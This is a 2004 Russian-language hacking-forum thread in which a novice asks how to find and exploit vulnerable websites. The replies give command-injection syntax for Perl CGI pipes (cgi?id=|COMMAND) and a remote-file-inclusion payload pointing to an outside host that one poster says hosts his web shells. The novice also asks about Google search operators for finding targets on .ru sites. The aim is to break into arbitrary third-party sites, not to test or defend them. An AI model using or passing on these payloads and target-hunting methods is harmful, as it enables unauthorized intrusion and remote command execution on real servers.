Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   CGI::open() (https://forum.antichat.xyz/showthread.php?t=4441)

Xalegi 12.12.2004 01:34

CGI::open()
 
Братва... я знаю, что я оооочень тупой и мне до вас далеко... но я хочу понять фсё эт... дык.. у мну трабл вот такой...

см тему...

куда надо (или вместо чего) нужно написать |id| или другие команды в, примерно, такой строчке:

.... cgi?id=103 ....
или
.... php?t=filename ....

и где большая вероятность бага?

я пробывал ооочень много... и туда впихиавл.. и туда.. везде.. и не только одну команду.. каждый вечер у меня уходит часа по 3 на поиск бажного сайта... ну ничего не получается.. не нахожу...

Кстати... о поиске.... чтоб найти в гугле определённое значене в УРЛе, нада зделать так:

filetype: cgi pl html site: .ru
(попрвате плииизз, еси я не прав... он должен мне выдать сайты, где встречается ИЛИ cgi ИЛИ перловские файты\скрипты и хтмл и обязательно тока с доменом 3-ого уровня .ru )

какие ещё есть конады для поиска в ггууггллее ?

Fr1k 12.12.2004 13:39

Что ты поиском найти хочишь? пиши конкретней!

Xalegi 12.12.2004 15:13

ну к примеру сайт, где в адресной строке браузера присутствует "cgi?p=filename" b ljgecnbv? xnj, ,sk cfqn c www.*****.****.RU !!!

Algol 12.12.2004 15:21

Цитата:

.... cgi?id=103 ....
или
.... php?t=filename ....

и где большая вероятность бага?
Это совершенно разные типы уязвимостей.
id=103 - здесь скорее всего может встретится SQL-инъекция
а здесь php?t=filename - PHP инъекция.

Xalegi 12.12.2004 15:35

Algol оо.. спасибки...

вот допустим у меня попались такие две вещи... (на разных сайтах ессенно)

cgi?id=103
чтоб проверить выполняемость команд (толком в ДЕЙСТВИИ видел тока |id| поэтому юзаю в начале тока её)
мне надо зделать:
cgi?id=|id|
или
cgi?|id|=103 ?


а вот в php?t=filename чтоб просмотреть права
нада именно значение переменной измненить на ";id;" так???

Че Гевара 12.12.2004 19:04

В перловых скриптах есть некоторые фичи ... Например, пайп(Символ | ), который открывает аргумент функции не для чтения, а для испонения, что дает возможность использовать этот скрипт, как web-шелл ...
Цитата:

чтоб проверить выполняемость команд (толком в ДЕЙСТВИИ видел тока |id| поэтому юзаю в начале тока её)
мне надо зделать:
cgi?id=|id|
или
cgi?|id|=103 ?
Если в этой переменной id не проверяются входные параметры, то по идее синтаксис команд должен быть таков:
Код:

  cgi?id=|ТУТ_ИДЕТ_КОМАНДА

Как сказал алгол, в этом случае возможна php-инъекция:
Код:

  php?t=filename
Использовать это можно использовать так:
Код:

  php?t=http://xssteam.narod.ru/conf.php&cmd=КОМАНДА
Но прокатит это только в том случае, если возможен удаленный инклуд ...

Xalegi 12.12.2004 19:38

ооо.. Чегевар =)) спасибо большое!!!!!!!!!!!!!!!!!!!

кстати...

http://xssteam.narod.ru/conf.php

-это реальный сайт? т.е. он работающий?

Че Гевара 12.12.2004 19:50

Ну это мой сайт, куда я залил несколько web-шеллов как раз для таких целей ))

Xalegi 12.12.2004 19:57

Чегевар... дык.. эта.. есть кучу вопросик... те можно в аську? или лучше тут? ну вопросы конкретные есть... или лучше тут?

Че Гевара 12.12.2004 20:17

Лучше тут ...


Время: 04:57